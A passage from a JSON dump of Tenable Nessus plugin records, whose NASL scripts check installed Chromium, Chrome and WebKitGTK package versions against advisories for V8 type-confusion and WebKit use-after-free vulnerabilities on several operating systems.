script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ungoogled-chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, 
Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'chromium<107.0.5304.87',\n 'ungoogled-chromium<107.0.5304.87'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-02T15:06:10", "description": "The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5121 advisory.\n\n - Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(CVE-2022-1364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-19T00:00:00", "type": "nessus", "title": "Debian DSA-5121-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1364"], "modified": "2023-11-01T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "p-cpe:/a:debian:debian_linux:chromium-common", "p-cpe:/a:debian:debian_linux:chromium-driver", "p-cpe:/a:debian:debian_linux:chromium-l10n", "p-cpe:/a:debian:debian_linux:chromium-sandbox", "p-cpe:/a:debian:debian_linux:chromium-shell", "cpe:/o:debian:debian_linux:11.0"], "id": "DEBIAN_DSA-5121.NASL", "href": "https://www.tenable.com/plugins/nessus/159898", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5121. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159898);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/01\");\n\n script_cve_id(\"CVE-2022-1364\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/06\");\n script_xref(name:\"IAVA\", value:\"2022-A-0156-S\");\n\n script_name(english:\"Debian DSA-5121-1 : chromium - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5121\nadvisory.\n\n - Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. 
(CVE-2022-1364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/chromium\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2022/dsa-5121\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-1364\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/chromium\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (bullseye), this problem has been fixed in version 100.0.4896.127-1~deb11u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1364\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-driver\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:chromium-l10n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-sandbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-shell\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar release = get_kb_item('Host/Debian/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Debian');\nvar release = chomp(release);\nif (! 
preg(pattern:\"^(11)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 11.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '11.0', 'prefix': 'chromium', 'reference': '100.0.4896.127-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-common', 'reference': '100.0.4896.127-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-driver', 'reference': '100.0.4896.127-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-l10n', 'reference': '100.0.4896.127-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-sandbox', 'reference': '100.0.4896.127-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-shell', 'reference': '100.0.4896.127-1~deb11u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium / chromium-common / chromium-driver / chromium-l10n / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-08T13:31:32", "description": "The remote Oracle Linux 8 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2023-3108 advisory.\n\n - A flaw was found in the WebKitGTK 
package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2. (CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-05-24T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : webkit2gtk3 (ELSA-2023-3108)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-29T00:00:00", "cpe": ["cpe:/o:oracle:linux:8", "p-cpe:/a:oracle:linux:webkit2gtk3", "p-cpe:/a:oracle:linux:webkit2gtk3-devel", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel"], "id": "ORACLELINUX_ELSA-2023-3108.NASL", "href": "https://www.tenable.com/plugins/nessus/176307", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2023-3108.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(176307);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/29\");\n\n script_cve_id(\"CVE-2023-2203\");\n\n script_name(english:\"Oracle Linux 8 : webkit2gtk3 (ELSA-2023-3108)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2023-3108 advisory.\n\n - A flaw was found in the WebKitGTK package. 
An improper input validation issue may lead to a use-after-free\n vulnerability. This flaw allows attackers with network access to pass specially crafted web content files,\n causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205\n security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux\n 9.2. (CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2023-3108.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2203\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/05/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(os_release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:os_release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 8', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check 
= NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release) {\n if (exists_check) {\n if (rpm_exists(release:_release, rpm:exists_check) && rpm_check(release:_release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-17T12:57:12", "description": "The version of Google Chrome installed on the remote macOS host is prior to 108.0.5359.94. It is, therefore, affected by a vulnerability as referenced in the 2022_12_stable-channel-update-for-desktop advisory.\n\n - Type Confusion in V8. 
(CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-12-02T00:00:00", "type": "nessus", "title": "Google Chrome < 108.0.5359.94 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-4262"], "modified": "2023-09-20T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_108_0_5359_94.NASL", "href": "https://www.tenable.com/plugins/nessus/168373", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168373);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/20\");\n\n script_cve_id(\"CVE-2022-4262\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/12/26\");\n script_xref(name:\"IAVA\", value:\"2022-A-0507-S\");\n\n script_name(english:\"Google Chrome < 108.0.5359.94 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 108.0.5359.94. It is, therefore, affected by\na vulnerability as referenced in the 2022_12_stable-channel-update-for-desktop advisory.\n\n - Type Confusion in V8. 
(CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/12/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?11d8a245\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1394403\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 108.0.5359.94 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-4262\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/12/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'108.0.5359.94', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-17T12:58:14", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2022:10236-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-12-09T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : chromium (openSUSE-SU-2022:10236-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-4262"], "modified": "2023-09-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromium", "cpe:/o:novell:opensuse:15.3", "cpe:/o:novell:opensuse:15.4"], "id": "OPENSUSE-2022-10236-1.NASL", "href": "https://www.tenable.com/plugins/nessus/168539", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2022:10236-1. 
The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168539);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/20\");\n\n script_cve_id(\"CVE-2022-4262\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/12/26\");\n\n script_name(english:\"openSUSE 15 Security Update : chromium (openSUSE-SU-2022:10236-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2022:10236-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1205999\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/HYWSKXQCLKUA2XSRYX5WQISODN4DQ3PR/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?abb37f45\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-4262\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromedriver and / or chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-4262\");\n\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/12/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/SuSE/release');\nif (isnull(os_release) || os_release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar _os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:os_release);\nif (isnull(_os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\n_os_ver = _os_ver[1];\nif (os_release !~ \"^(SUSE15\\.3|SUSE15\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3 / 15.4', os_release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + _os_ver, cpu);\n\nvar pkgs = [\n {'reference':'chromedriver-108.0.5359.94-bp154.2.52.1', 'cpu':'aarch64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromedriver-108.0.5359.94-bp154.2.52.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromedriver-108.0.5359.94-bp154.2.52.1', 'cpu':'aarch64', 'release':'SUSE15.4', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromedriver-108.0.5359.94-bp154.2.52.1', 'cpu':'x86_64', 'release':'SUSE15.4', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromium-108.0.5359.94-bp154.2.52.1', 'cpu':'aarch64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromium-108.0.5359.94-bp154.2.52.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromium-108.0.5359.94-bp154.2.52.1', 'cpu':'aarch64', 'release':'SUSE15.4', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromium-108.0.5359.94-bp154.2.52.1', 
